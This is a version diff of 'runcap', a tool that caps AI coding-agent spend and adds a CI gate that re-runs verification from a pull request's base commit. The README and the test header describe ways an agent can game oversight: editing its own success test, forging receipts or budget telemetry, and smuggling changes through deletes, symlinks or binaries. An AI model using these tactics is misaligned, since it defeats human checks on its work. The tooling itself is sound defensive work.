runcap 0.5.0 → 0.6.0
- package/README.md +49 -36
- package/bin/runcap.mjs +39 -21
- package/examples/runcap-adjudicate.yml +57 -0
- package/package.json +15 -12
- package/scripts/adjudicate-test.mjs +334 -0
- package/src/adjudicate.mjs +508 -0
package/README.md
CHANGED
|
@@ -4,7 +4,7 @@
|
|
|
4
4
|
|
|
5
5
|

|
|
6
6
|
|
|
7
|
-
**
|
|
7
|
+
**An AI coding agent can pass CI by editing the test that proves its own success. Runcap caps the spend before the run and issues evidence about whether that success check can be trusted. Free, MIT, local-first. Local runs keep Runcap's control plane on your machine; optional CI adjudication runs in your GitHub Actions environment.**
|
|
8
8
|
|
|
9
9
|
> **An agent passing CI is not enough.**
|
|
10
10
|
> Runcap verifies whether the evidence of success was altered during the mission.
|
|
@@ -20,7 +20,7 @@
|
|
|
20
20
|
Estimate the run → Cap the spend → Verify the outcome
|
|
21
21
|
```
|
|
22
22
|
|
|
23
|
-
|
|
23
|
+
Most cost and observability tools measure **tokens** used. But you don't buy tokens - you buy a result that passes a check. So Runcap measures the number that actually decides whether the spend was worth it:
|
|
24
24
|
|
|
25
25
|
> **Verified Outcome Cost = total run cost / tasks that passed verification.** An agent that talks but never fixes the bug can cost *more* than one that does - and a token dashboard calls it "cheaper."
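The formula above can be worked through with a small sketch. The `verifiedOutcomeCost` helper, the `costUsd` / `verified` field names, and the dollar figures are all assumptions made for illustration; they are not Runcap's API or measured results.

```javascript
// Hypothetical helper, not part of Runcap's API: computes
// Verified Outcome Cost = total run cost / tasks that passed verification.
function verifiedOutcomeCost(runs) {
  const totalCostUsd = runs.reduce((sum, run) => sum + run.costUsd, 0);
  const verifiedTasks = runs.filter((run) => run.verified).length;
  // Assumption of this sketch: when nothing passed verification the spend
  // bought no result, so report Infinity instead of dividing by zero.
  return verifiedTasks === 0 ? Infinity : totalCostUsd / verifiedTasks;
}

// Made-up numbers: three runs, two of which passed verification.
const runs = [
  { costUsd: 0.5, verified: true },
  { costUsd: 0.25, verified: false },
  { costUsd: 0.75, verified: true },
];

console.log(verifiedOutcomeCost(runs)); // 0.75 (1.50 total / 2 verified tasks)
```

Note that the unverified run still counts toward the numerator: money spent on a run that delivered nothing raises the cost of every result that did pass.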
|
|
26
26
|
|
|
@@ -32,15 +32,38 @@ Every other tool measures **tokens**. You don't buy tokens - you buy a result th
|
|
|
32
32
|
|
|
33
33
|
In a 6-run test on the same task, the run that **delivered nothing** cost *more* than the one that delivered, and the cheapest verified result was ~43x cheaper than the most expensive - same passing test. ([full table below](#real-results-6-runs-same-task-reproducible-offline))
|
|
34
34
|
|
|
35
|
-
>
|
|
35
|
+
> Most tools here are a rear-view mirror - they show you the bill *after* you paid it. Runcap estimates the bill *before* you start, caps it during the run, and issues evidence about whether the declared verification can be trusted. It is a circuit breaker with a receipt, not a dashboard.
|
|
36
36
|
|
|
37
37
|
> If Runcap caps a run for you or compresses a call, please **star the repo** - it is the one signal that tells me to keep building it in the open.
|
|
38
38
|
|
|
39
|
+
## Make a change earn merge eligibility
|
|
40
|
+
|
|
41
|
+
> AI can propose a change.
|
|
42
|
+
> Runcap makes it earn merge eligibility.
|
|
43
|
+
|
|
44
|
+
`runcap ci --mode adjudicate` is a required PR check that does not trust the agent or its receipt. It recomputes the merge decision in a clean CI job from the pull request's **base commit**:
|
|
45
|
+
|
|
46
|
+
```text
|
|
47
|
+
AI-generated PR
|
|
48
|
+
→ Runcap action pinned to an immutable release commit
|
|
49
|
+
→ policy / verifier / dependencies read from the PR base commit
|
|
50
|
+
→ clean CI replay
|
|
51
|
+
→ PASS / BLOCKED / HUMAN_APPROVAL_REQUIRED
|
|
52
|
+
```
|
|
53
|
+
|
|
54
|
+
- **`PASS`** - the base verifier failed, the replay passed, and the change was allowed text-only edits inside scope.
|
|
55
|
+
- **`BLOCKED`** - a scope violation, an unsafe diff type (delete / rename / binary / symlink / submodule / mode change), an unresolved base/head identity, or a failed replay.
|
|
56
|
+
- **`HUMAN_APPROVAL_REQUIRED`** - the change touches the policy, a workflow, a verifier file, a dependency manifest/lockfile, or a protected path. Runcap does not auto-approve changes to its own rules or evidence; a human CODEOWNER must approve.
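As a rough illustration of how these three verdicts could surface as a red/green check, the sketch below maps each verdict to a process exit code. The values follow the semantics stated in this release's test header (`PASS` and `HUMAN_APPROVAL_REQUIRED` exit 0, `BLOCKED` exits 1). The `exitCodeSketch` name and the fail-closed handling of unknown verdicts are assumptions; the real mapping is `exitCodeFor` in `src/adjudicate.mjs`, whose source is not reproduced here.

```javascript
// Hypothetical sketch, not the shipped exitCodeFor implementation.
const EXIT_CODES = new Map([
  ["PASS", 0],
  ["BLOCKED", 1],
  // Exits 0 because the decision is handed to a human CODEOWNER
  // rather than failed by the tool.
  ["HUMAN_APPROVAL_REQUIRED", 0],
]);

function exitCodeSketch(verdict) {
  // Assumption of this sketch: an unrecognized verdict fails closed.
  return EXIT_CODES.has(verdict) ? EXIT_CODES.get(verdict) : 1;
}

console.log(exitCodeSketch("PASS")); // 0
console.log(exitCodeSketch("BLOCKED")); // 1
console.log(exitCodeSketch("HUMAN_APPROVAL_REQUIRED")); // 0
```

Because `HUMAN_APPROVAL_REQUIRED` does not fail the job on its own, the CODEOWNERS rules in the required GitHub setup are what actually hold such a change until a human approves it.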
|
|
57
|
+
|
|
58
|
+
The verdict is a **CI-attested replay under a documented hardened GitHub profile**. It is *not* "unspoofable," *not* "fully independent," and it is *not* independent budget enforcement - its integrity rests on the [required GitHub setup](docs/trust-model.md#required-github-setup) being in place. The agent's receipt never decides the verdict: the required gate does not read it.
|
|
59
|
+
|
|
60
|
+
See the [trust model](docs/trust-model.md#ci-adjudication-v06) for exactly what v0.6 proves and what it does not, and [Install in a consumer repo](#install-in-a-consumer-repo) to wire it up.
|
|
61
|
+
|
|
39
62
|
## Why
|
|
40
63
|
|
|
41
64
|
**Agents loop on the same error, rewrite plans, and re-read files they just edited - every loop is tokens you pay for.** Multi-agent coding runs burn roughly **15x more tokens** than a single chat ([Anthropic engineering](https://www.anthropic.com/engineering/built-multi-agent-research-system)). They hand you a confident summary while the task is not actually done, and you find out what it cost when the invoice - or the subscription limit - arrives.
|
|
42
65
|
|
|
43
|
-
Observability tools (Langfuse, Helicone, LangSmith, AgentOps) measure the past. Gateways (LiteLLM, Portkey, OpenRouter) route the present.
|
|
66
|
+
Observability tools (Langfuse, Helicone, LangSmith, AgentOps) measure the past, and some run evals on outputs. Gateways (LiteLLM, Portkey, OpenRouter) route the present. What they don't do is enforce a mission policy *during* the run - a hard spend cap, allowed scope, protected verification evidence - then issue evidence about whether the agent's own success check can be trusted. Runcap does the things the rear-view mirror can't:
|
|
44
67
|
|
|
45
68
|
```text
|
|
46
69
|
estimate before build → cap during run → compress every call → rescue when stuck → verify the outcome
|
|
@@ -164,7 +187,7 @@ Every request that passes through the gateway is compressed before it's forwarde
|
|
|
164
187
|
|
|
165
188
|
1. **Per-field trim** - embedded JSON re-serialized compactly, long log/stack-trace dumps collapsed to head + tail, trailing whitespace squeezed.
|
|
166
189
|
2. **Identical-block dedup** - when the exact same file dump or tool_result ships again in the same request, the repeat is replaced with a deterministic stub.
|
|
167
|
-
3. **Delta-encoding of near-duplicates
|
|
190
|
+
3. **Delta-encoding of near-duplicates.** When the agent reads a file, edits one line, and re-reads it, the block is *similar but not identical*, so plain dedup saves nothing. Runcap sends a readable line-diff against the version the model already saw, and the model reconstructs the current file from it. On a real OpenAI call, an edited-file re-read dropped from **1186 to 737 prompt tokens - 37.9% saved, with the model still answering correctly about the changed line.** Proof and reproduction steps: [docs/delta-encoding-evidence.md](https://github.com/kirder24-code/ai-agent-manager/blob/main/docs/delta-encoding-evidence.md).
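To make the delta idea in step 3 concrete, here is a minimal sketch. It is not Runcap's algorithm: instead of a full line-diff it only trims the lines two versions share at the start and at the end, which is enough for the "edit one line, re-read the file" case. The `lineDelta` and `applyDelta` names and the delta shape are hypothetical.

```javascript
// Hypothetical sketch: describe `current` relative to `previous` by trimming
// the lines both versions share at the start and at the end.
function lineDelta(previous, current) {
  const a = previous.split("\n");
  const b = current.split("\n");
  let prefix = 0;
  while (prefix < a.length && prefix < b.length && a[prefix] === b[prefix]) {
    prefix++;
  }
  let suffix = 0;
  while (
    suffix < a.length - prefix &&
    suffix < b.length - prefix &&
    a[a.length - 1 - suffix] === b[b.length - 1 - suffix]
  ) {
    suffix++;
  }
  return {
    start: prefix, // index of the first replaced line
    removed: a.length - prefix - suffix, // how many old lines to drop
    inserted: b.slice(prefix, b.length - suffix), // new lines to put there
  };
}

// Rebuild the current text from the previous text plus the delta.
function applyDelta(previous, delta) {
  const lines = previous.split("\n");
  lines.splice(delta.start, delta.removed, ...delta.inserted);
  return lines.join("\n");
}

const before = "const a = 1;\nconst b = 2;\nconst c = 3;";
const after = "const a = 1;\nconst b = 20;\nconst c = 3;";
const delta = lineDelta(before, after);
console.log(delta.inserted); // [ 'const b = 20;' ]
console.log(applyDelta(before, delta) === after); // true
```

Only the changed middle section travels again; the receiver rebuilds the full file from the copy it already holds. Edits scattered across a file would need a real diff algorithm to stay compact.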
|
|
168
191
|
|
|
169
192
|
It's pure Node with **zero native or ML dependencies** (the only runtime dependency is `js-yaml`, pure JS), so it installs everywhere without the build pain heavier compressors have.
|
|
170
193
|
|
|
@@ -301,30 +324,24 @@ runcap mission run -- claude "fix the failing checkout test, then stop"
|
|
|
301
324
|
- spend exceeded `mission_hard_limit_usd`, or the gateway's budget guard tripped mid-run;
|
|
302
325
|
- `max_llm_calls` or `max_runtime_minutes` was exceeded.
|
|
303
326
|
|
|
304
|
-
### The
|
|
327
|
+
### The local grade vs. the CI adjudication
|
|
305
328
|
|
|
306
|
-
|
|
307
|
-
# .github/workflows/runcap.yml
|
|
308
|
-
jobs:
|
|
309
|
-
runcap-mission:
|
|
310
|
-
runs-on: ubuntu-latest
|
|
311
|
-
steps:
|
|
312
|
-
- uses: actions/checkout@v4
|
|
313
|
-
- uses: actions/setup-node@v4
|
|
314
|
-
with: { node-version: 20 }
|
|
315
|
-
# 1. Run the agent under the policy (produces a graded receipt + exits 1 on BLOCKED)
|
|
316
|
-
- run: npx runcap mission run -- <your agent command>
|
|
317
|
-
# 2. Grade the latest receipt against the committed policy and annotate the PR
|
|
318
|
-
- uses: kirder24-code/ai-agent-manager@v1
|
|
319
|
-
with:
|
|
320
|
-
policy: .runcap/mission.yaml
|
|
321
|
-
```
|
|
329
|
+
There are two ways the policy verdict reaches a PR, and they trust different things:
|
|
322
330
|
|
|
323
|
-
|
|
331
|
+
- **`runcap mission run`** (local / same-job) grades the run it just executed and re-checks it against the committed policy text. Useful, but the receipt it produces is *agent-side* evidence.
|
|
332
|
+
- **`runcap ci --mode adjudicate`** (the required PR check) trusts none of that. It recomputes the verdict in a clean CI job from the PR's base commit and **never reads the agent receipt**. This is the gate that decides merge eligibility.
|
|
324
333
|
|
|
325
|
-
|
|
326
|
-
|
|
327
|
-
|
|
334
|
+
### Install in a consumer repo
|
|
335
|
+
|
|
336
|
+
Make the adjudication a required red/green PR check in your own repo:
|
|
337
|
+
|
|
338
|
+
1. Add `.runcap/mission.yaml` (the policy - see the example above).
|
|
339
|
+
2. Copy `examples/runcap-adjudicate.yml` into `.github/workflows/`.
|
|
340
|
+
3. Replace the all-zero `RUNCAP_ACTION_SHA` placeholder with the full immutable commit SHA of the released version (resolve it with `gh api repos/kirder24-code/ai-agent-manager/git/refs/tags/vX.Y.Z --jq '.object.sha'`).
|
|
341
|
+
4. Configure the hardened GitHub branch profile (protected branch, required check, up-to-date-before-merge, dismiss stale approvals, CODEOWNERS for workflow/policy/verifier/dependency/protected paths, no bypass for ordinary authors) - the full list is in the [trust model](docs/trust-model.md#required-github-setup).
|
|
342
|
+
5. Make `Runcap adjudicate` a required status check.
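Step 3 is easy to get wrong, so a pre-flight check on the `uses:` line can help. The sketch below is a hypothetical helper, not a Runcap command: it confirms only that the ref is a full 40-character lowercase hex SHA and is no longer the all-zero placeholder. It cannot confirm that the SHA belongs to a published release; that still has to be resolved as described in step 3.

```javascript
// Hypothetical pre-flight check, not part of Runcap.
function checkActionPin(usesLine) {
  // Capture everything after "@" up to whitespace or a trailing "#" comment.
  const match = /@([^\s#]+)/.exec(usesLine);
  if (!match) return { ok: false, reason: "no @ref found" };
  const ref = match[1];
  if (!/^[0-9a-f]{40}$/.test(ref)) {
    return { ok: false, reason: "ref is not a full 40-character commit SHA" };
  }
  if (/^0{40}$/.test(ref)) {
    return { ok: false, reason: "ref is still the all-zero placeholder" };
  }
  return { ok: true, reason: "pinned to a full commit SHA" };
}

const placeholder =
  "uses: kirder24-code/ai-agent-manager@0000000000000000000000000000000000000000 # pin to a release SHA";
console.log(checkActionPin(placeholder).reason); // ref is still the all-zero placeholder
console.log(checkActionPin("uses: actions/checkout@v4").reason); // ref is not a full 40-character commit SHA
```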
|
|
343
|
+
|
|
344
|
+
> The template ships with an all-zero placeholder SHA and is **intentionally not runnable until you insert the release SHA**. This is deliberate: the judge must be an immutable release commit that lives outside the candidate PR, so a malicious PR cannot rewrite its own judge.
|
|
328
345
|
|
|
329
346
|
A reviewer sees one of two things:
|
|
330
347
|
|
|
@@ -361,20 +378,16 @@ Runcap is built not to fake certainty. Every important output carries a truth la
|
|
|
361
378
|
|
|
362
379
|
If it cannot prove something, it says so.
|
|
363
380
|
|
|
364
|
-
##
|
|
381
|
+
## Availability
|
|
365
382
|
|
|
366
|
-
|
|
367
|
-
|---|---|---|
|
|
368
|
-
| **OSS** (MIT, local) | $0 forever | All local runs, cost estimation, hard cap, run wrapping, stuck detection, rescue prompts, local dashboard. Never crippleware. |
|
|
369
|
-
| **Founding Pro** (limited) | **$49 once** | Lifetime Pro at the founder price - pay once, keep Pro forever, before it moves to $19/mo. |
|
|
370
|
-
| **Pro** | $19/mo | Cloud sync across machines, hosted dashboard, estimate-vs-actual trends, shareable reports, alerts on cap breach |
|
|
371
|
-
| **Team** | $49/seat/mo | Shared budget pools, org-wide ceilings, per-project rollups, role-based caps |
|
|
383
|
+
Runcap v0.6 is open-source and free under MIT.
|
|
372
384
|
|
|
373
|
-
The local
|
|
385
|
+
The local CLI and CI adjudication mode are available now.
|
|
386
|
+
Hosted sync, team budget pools, organization reporting, and paid plans are future ideas only. They are not available for purchase today.
|
|
374
387
|
|
|
375
388
|
## Current stage
|
|
376
389
|
|
|
377
|
-
A working local tool, not a hosted SaaS. Ready for: wrapping real Codex / Claude / Cursor sessions, catching stuck agents,
|
|
390
|
+
A working local tool plus an optional CI adjudication mode, not a hosted SaaS. Ready for: wrapping real Codex / Claude / Cursor sessions, catching stuck agents, proving rescue prompts save time, and gating AI-generated pull requests in GitHub Actions. Not yet: a hosted cloud platform or a universal observability standard. It is not trying to replace Langfuse or LiteLLM; it focuses on a different layer - pre-run cost caps and merge-eligibility evidence.
|
|
378
391
|
|
|
379
392
|
## Documentation
|
|
380
393
|
|
|
@@ -391,4 +404,4 @@ Runcap is built and maintained by Kirill D., a solo AI and automation consultant
|
|
|
391
404
|
|
|
392
405
|
---
|
|
393
406
|
|
|
394
|
-
The thesis: **AI
|
|
407
|
+
The thesis: **AI can propose a change. It should not certify its own success.**
|
package/bin/runcap.mjs
CHANGED
|
@@ -41,6 +41,7 @@ import {
|
|
|
41
41
|
policyMeta,
|
|
42
42
|
formatPolicyBlock
|
|
43
43
|
} from "../src/policy.mjs";
|
|
44
|
+
import { adjudicate, formatAdjudication, exitCodeFor } from "../src/adjudicate.mjs";
|
|
44
45
|
import { readFileSync, appendFileSync } from "node:fs";
|
|
45
46
|
|
|
46
47
|
const args = process.argv.slice(2);
|
|
@@ -61,6 +62,9 @@ Usage:
|
|
|
61
62
|
(enforce the repo policy; exit 1 if the mission is BLOCKED)
|
|
62
63
|
runcap ci [--policy path] [--receipt path]
|
|
63
64
|
(grade a receipt against the policy; writes PR summary, exit 1 on BLOCKED)
|
|
65
|
+
runcap ci --mode adjudicate [--policy path] [--base sha --head sha]
|
|
66
|
+
(Tier 3: recompute the verdict in CI from the PR's base commit -
|
|
67
|
+
never trusts the agent's receipt; exit 1 on BLOCKED)
|
|
64
68
|
runcap plans
|
|
65
69
|
runcap cap <usd> (set the hard cap the gateway enforces)
|
|
66
70
|
runcap cap show (show the current cap)
|
|
@@ -311,32 +315,46 @@ try {
|
|
|
311
315
|
if (result.receipt.policy?.verdict === "BLOCKED") process.exitCode = 1;
|
|
312
316
|
} else if (command === "ci") {
|
|
313
317
|
const ciArgs = args.slice(1);
|
|
318
|
+
const mode = takeOption(ciArgs, "--mode");
|
|
314
319
|
const policyPath = takeOption(ciArgs, "--policy");
|
|
315
320
|
const receiptPath = takeOption(ciArgs, "--receipt");
|
|
316
321
|
|
|
317
|
-
|
|
318
|
-
|
|
319
|
-
|
|
320
|
-
|
|
321
|
-
|
|
322
|
-
|
|
323
|
-
|
|
324
|
-
|
|
325
|
-
|
|
326
|
-
|
|
327
|
-
|
|
328
|
-
receipt = JSON.parse(readFileSync(receiptPath, "utf8"));
|
|
322
|
+
if (mode === "adjudicate") {
|
|
323
|
+
// Tier 3: recompute the verdict from the BASE commit of the PR in a clean
|
|
324
|
+
// checkout. Trusts only the base/head SHAs from the pull_request event (or
|
|
325
|
+
// explicit --base/--head for local runs); never the agent's receipt.
|
|
326
|
+
const baseFlag = takeOption(ciArgs, "--base");
|
|
327
|
+
const headFlag = takeOption(ciArgs, "--head");
|
|
328
|
+
const verdict = await adjudicate({ cwd: process.cwd(), baseFlag, headFlag, policyPath });
|
|
329
|
+
const lines = formatAdjudication(verdict);
|
|
330
|
+
console.log(lines.join("\n"));
|
|
331
|
+
writeCiSummary(["## Runcap CI adjudication: " + verdict.verdict, "", "```", ...lines, "```"].join("\n"));
|
|
332
|
+
process.exitCode = exitCodeFor(verdict.verdict);
|
|
329
333
|
} else {
|
|
330
|
-
const
|
|
331
|
-
if (!
|
|
332
|
-
|
|
333
|
-
|
|
334
|
+
const loaded = loadPolicy(process.cwd(), policyPath);
|
|
335
|
+
if (!loaded) throw new Error("No policy found. Create .runcap/mission.yaml (or pass --policy <path>).");
|
|
336
|
+
const { ok, errors } = validatePolicy(loaded.policy);
|
|
337
|
+
if (!ok) {
|
|
338
|
+
for (const e of errors) console.error(` policy error: ${e}`);
|
|
339
|
+
writeCiSummary(["## Runcap mission: policy INVALID", "", ...errors.map((e) => `- ${e}`)].join("\n"));
|
|
340
|
+
throw new Error("Mission policy is invalid.");
|
|
341
|
+
}
|
|
342
|
+
|
|
343
|
+
let receipt;
|
|
344
|
+
if (receiptPath) {
|
|
345
|
+
receipt = JSON.parse(readFileSync(receiptPath, "utf8"));
|
|
346
|
+
} else {
|
|
347
|
+
const id = await latestOutcomeId();
|
|
348
|
+
if (!id) throw new Error("No outcome receipt found. Run `runcap mission run ...` first, or pass --receipt <path>.");
|
|
349
|
+
receipt = JSON.parse(readFileSync(`.runcap/outcomes/${id}/receipt.json`, "utf8"));
|
|
350
|
+
}
|
|
334
351
|
|
|
335
|
-
|
|
336
|
-
|
|
337
|
-
|
|
338
|
-
|
|
339
|
-
|
|
352
|
+
const verdict = evaluatePolicyVerdict(receipt, loaded.policy);
|
|
353
|
+
const block = formatPolicyBlock({ ...policyMeta(loaded), ...verdict });
|
|
354
|
+
console.log(block.join("\n"));
|
|
355
|
+
writeCiSummary(["## Runcap mission verdict: " + verdict.verdict, "", "```", ...block, "```"].join("\n"));
|
|
356
|
+
if (verdict.verdict === "BLOCKED") process.exitCode = 1;
|
|
357
|
+
}
|
|
340
358
|
} else if (command === "login") {
|
|
341
359
|
console.log(await loginCommand(args[1]));
|
|
342
360
|
} else if (command === "logout") {
|
package/examples/runcap-adjudicate.yml
ADDED
|
@@ -0,0 +1,57 @@
|
|
|
1
|
+
# Reference workflow: drop this into a CONSUMER repo at
|
|
2
|
+
# .github/workflows/runcap-adjudicate.yml to make Runcap's independent verdict a
|
|
3
|
+
# required red/green PR check.
|
|
4
|
+
#
|
|
5
|
+
# The whole point of Tier 3 is that the JUDGE is not the candidate. This
|
|
6
|
+
# workflow therefore NEVER runs code from the pull request's workspace - no
|
|
7
|
+
# `node ./bin/runcap.mjs`, no `uses: ./`, no `npm ci` of the PR's manifest. The
|
|
8
|
+
# adjudicator comes only from the Runcap action pinned by a FULL 40-character
|
|
9
|
+
# commit SHA, so a malicious PR cannot rewrite its own judge. The checkout below
|
|
10
|
+
# brings in the PR's git history purely as DATA: the adjudicator reads the base
|
|
11
|
+
# commit's policy and replays the base-pinned verifier in a clean worktree it
|
|
12
|
+
# creates itself. Workspace files are never executed as the judge.
|
|
13
|
+
#
|
|
14
|
+
# Security posture (every line is load-bearing):
|
|
15
|
+
# - `on: pull_request` (NOT pull_request_target): a fork PR runs with a
|
|
16
|
+
# read-only token and no access to repo secrets.
|
|
17
|
+
# - `permissions: contents: read`: the only scope granted.
|
|
18
|
+
# - Every action pinned by full commit SHA, never a floating tag, so the bytes
|
|
19
|
+
# that run are immutable.
|
|
20
|
+
# - `persist-credentials: false`: the checkout token is not left on disk for
|
|
21
|
+
# PR-controlled steps to find.
|
|
22
|
+
# - GitHub-hosted runner, capped runtime, single self-sufficient required
|
|
23
|
+
# check with no `needs:` on any upstream job.
|
|
24
|
+
#
|
|
25
|
+
# Pin RUNCAP_ACTION_SHA to the commit a Runcap release tag points at. Resolve it
|
|
26
|
+
# with: gh api repos/kirder24-code/ai-agent-manager/git/refs/tags/vX.Y.Z --jq '.object.sha'
|
|
27
|
+
name: Runcap adjudicate
|
|
28
|
+
|
|
29
|
+
on:
|
|
30
|
+
pull_request:
|
|
31
|
+
|
|
32
|
+
permissions:
|
|
33
|
+
contents: read
|
|
34
|
+
|
|
35
|
+
jobs:
|
|
36
|
+
adjudicate:
|
|
37
|
+
runs-on: ubuntu-latest
|
|
38
|
+
timeout-minutes: 10
|
|
39
|
+
steps:
|
|
40
|
+
- name: Checkout (full history so the base commit is available, no token left on disk)
|
|
41
|
+
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
|
|
42
|
+
with:
|
|
43
|
+
fetch-depth: 0
|
|
44
|
+
persist-credentials: false
|
|
45
|
+
|
|
46
|
+
- name: Setup Node
|
|
47
|
+
uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
|
|
48
|
+
with:
|
|
49
|
+
node-version: 22
|
|
50
|
+
|
|
51
|
+
# The judge: the Runcap action pinned by a full commit SHA. Replace the SHA
|
|
52
|
+
# below with the commit a published Runcap release tag points at. This is
|
|
53
|
+
# the ONLY code that decides the verdict, and it cannot come from the PR.
|
|
54
|
+
- name: Runcap independent adjudication
|
|
55
|
+
uses: kirder24-code/ai-agent-manager@0000000000000000000000000000000000000000 # pin to a release SHA
|
|
56
|
+
with:
|
|
57
|
+
mode: adjudicate
|
package/package.json
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "runcap",
|
|
3
|
-
"version": "0.
|
|
4
|
-
"description": "
|
|
3
|
+
"version": "0.6.0",
|
|
4
|
+
"description": "Policy-bound budget enforcement and verification-integrity evidence for AI coding agents. Cap spend, enforce allowed scope, and fail the pull request when an agent tampers with its own success check. Local, MIT.",
|
|
5
5
|
"license": "MIT",
|
|
6
6
|
"type": "module",
|
|
7
7
|
"author": "Kirill D. <kirill@launchsoloai.com> (https://launchsoloai.com)",
|
|
@@ -15,16 +15,18 @@
|
|
|
15
15
|
},
|
|
16
16
|
"keywords": [
|
|
17
17
|
"ai",
|
|
18
|
-
"agent",
|
|
19
|
-
"
|
|
20
|
-
"
|
|
18
|
+
"ai-coding-agent",
|
|
19
|
+
"ai-agent-governance",
|
|
20
|
+
"agent-security",
|
|
21
|
+
"verification-integrity",
|
|
22
|
+
"policy-as-code",
|
|
23
|
+
"github-actions",
|
|
24
|
+
"ci",
|
|
25
|
+
"pull-request",
|
|
21
26
|
"budget",
|
|
22
|
-
"
|
|
23
|
-
"openai",
|
|
24
|
-
"gateway",
|
|
27
|
+
"cost",
|
|
25
28
|
"cli",
|
|
26
|
-
"llm"
|
|
27
|
-
"token-cost"
|
|
29
|
+
"llm"
|
|
28
30
|
],
|
|
29
31
|
"files": [
|
|
30
32
|
"bin/",
|
|
@@ -45,11 +47,12 @@
|
|
|
45
47
|
"acceptance": "node ./scripts/acceptance.mjs",
|
|
46
48
|
"smoke": "node ./bin/runcap.mjs run --label smoke -- npm --prefix examples/broken-ts-app run build",
|
|
47
49
|
"demo:broken": "node ./bin/runcap.mjs run --label broken-ts-demo -- npm --prefix examples/broken-ts-app run build",
|
|
48
|
-
"test": "node ./scripts/delta-test.mjs && node ./scripts/loop-test.mjs && node ./scripts/loop-e2e.mjs && node ./scripts/validate-demo.mjs && node ./scripts/outcome-test.mjs && node ./scripts/guard-test.mjs && node ./scripts/policy-test.mjs && node ./scripts/mission-test.mjs",
|
|
50
|
+
"test": "node ./scripts/delta-test.mjs && node ./scripts/loop-test.mjs && node ./scripts/loop-e2e.mjs && node ./scripts/validate-demo.mjs && node ./scripts/outcome-test.mjs && node ./scripts/guard-test.mjs && node ./scripts/policy-test.mjs && node ./scripts/mission-test.mjs && node ./scripts/adjudicate-test.mjs",
|
|
49
51
|
"test:outcome": "node ./scripts/outcome-test.mjs",
|
|
50
52
|
"test:guard": "node ./scripts/guard-test.mjs",
|
|
51
53
|
"test:policy": "node ./scripts/policy-test.mjs",
|
|
52
54
|
"test:mission": "node ./scripts/mission-test.mjs",
|
|
55
|
+
"test:tier3": "node ./scripts/adjudicate-test.mjs",
|
|
53
56
|
"outcome": "node ./bin/runcap.mjs outcome",
|
|
54
57
|
"test:delta": "node ./scripts/delta-test.mjs",
|
|
55
58
|
"test:loop": "node ./scripts/loop-test.mjs",
|
|
@@ -61,7 +64,7 @@
|
|
|
61
64
|
"screenshots": "node ./scripts/render-media-screenshots.mjs",
|
|
62
65
|
"gateway": "node ./bin/runcap.mjs gateway",
|
|
63
66
|
"fuel": "node ./bin/runcap.mjs fuel",
|
|
64
|
-
"check": "node --check ./bin/runcap.mjs && node --check ./src/mission-control.mjs"
|
|
67
|
+
"check": "node --check ./bin/runcap.mjs && node --check ./src/mission-control.mjs && node --check ./src/adjudicate.mjs"
|
|
65
68
|
},
|
|
66
69
|
"engines": {
|
|
67
70
|
"node": ">=20"
|
package/scripts/adjudicate-test.mjs
ADDED
|
@@ -0,0 +1,334 @@
|
|
|
1
|
+
// Tier 3: proves the CI adjudicator recomputes the verdict from the PR's BASE
|
|
2
|
+
// commit and never trusts the agent's receipt. Everything runs offline inside a
|
|
3
|
+
// throwaway git repo. The adjudicator is driven both directly (the function) and
|
|
4
|
+
// through the real `bin/runcap.mjs ci --mode adjudicate` so the exit codes a
|
|
5
|
+
// reviewer's PR check would see are tested too.
|
|
6
|
+
//
|
|
7
|
+
// Verdict semantics under test:
|
|
8
|
+
// PASS -> exit 0
|
|
9
|
+
// BLOCKED -> exit 1
|
|
10
|
+
// HUMAN_APPROVAL_REQUIRED -> exit 0 (success/neutral: hands authority to a CODEOWNER)
|
|
11
|
+
//
|
|
12
|
+
// Threat scenarios: forged receipt, forged budget telemetry, no telemetry,
|
|
13
|
+
// honest pass, out-of-scope edit, baseline-already-green, clean-replay fail,
|
|
14
|
+
// protected/verifier/policy/workflow/dependency human gates, unresolved SHA,
|
|
15
|
+
// untrusted event, diff-smuggling (delete/symlink/binary), and two honesty
|
|
16
|
+
// checks: the verdict never claims runtime hardening attestation, and the
|
|
17
|
+
// dependency install is pinned + script-free.
|
|
18
|
+
|
|
19
|
+
import os from "node:os";
|
|
20
|
+
import path from "node:path";
|
|
21
|
+
import { fileURLToPath } from "node:url";
|
|
22
|
+
import { execFileSync } from "node:child_process";
|
|
23
|
+
import { mkdtempSync, writeFileSync, mkdirSync, rmSync, readFileSync, symlinkSync } from "node:fs";
|
|
24
|
+
|
|
25
|
+
const HERE = path.dirname(fileURLToPath(import.meta.url));
|
|
26
|
+
const SRC_DIR = process.env.RUNCAP_SRC ?? path.join(HERE, "..", "src");
|
|
27
|
+
const BIN = path.join(SRC_DIR, "..", "bin", "runcap.mjs");
|
|
28
|
+
const REPO_ROOT = path.join(HERE, "..");
|
|
29
|
+
|
|
30
|
+
const tmp = mkdtempSync(path.join(os.tmpdir(), "runcap-adj-"));
|
|
31
|
+
process.chdir(tmp);
|
|
32
|
+
|
|
33
|
+
let failures = 0;
|
|
34
|
+
const check = (name, pass, detail) => { if (!pass) failures++; console.log(`${pass ? "PASS" : "FAIL"} ${name}${detail ? " - " + detail : ""}`); };
|
|
35
|
+
|
|
36
|
+
const g = (...a) => execFileSync("git", a, { cwd: tmp, stdio: "pipe" }).toString().trim();
|
|
37
|
+
|
|
38
|
+
// --- base commit: a real failing task, a verifier, a policy, scope app/ -----
|
|
39
|
+
mkdirSync(path.join(tmp, "app"), { recursive: true });
|
|
40
|
+
mkdirSync(path.join(tmp, ".runcap"), { recursive: true });
|
|
41
|
+
writeFileSync(path.join(tmp, "app", "broken.mjs"), "export const ok = false;\n");
|
|
42
|
+
writeFileSync(path.join(tmp, "app", "verify.mjs"),
|
|
43
|
+
"import { ok } from './broken.mjs'; import assert from 'node:assert'; assert.strictEqual(ok, true, 'not fixed'); console.log('ok');\n");
|
|
44
|
+
writeFileSync(path.join(tmp, "app", "other.mjs"), "export const other = 0;\n");
|
|
45
|
+
writeFileSync(path.join(tmp, "rootfile.txt"), "root\n");
|
|
46
|
+
writeFileSync(path.join(tmp, "package.json"), JSON.stringify({ name: "fixture", version: "1.0.0", scripts: { build: "echo build" } }, null, 2) + "\n");
|
|
47
|
+
writeFileSync(path.join(tmp, ".runcap", "mission.yaml"), `version: v1
|
|
48
|
+
identity:
|
|
49
|
+
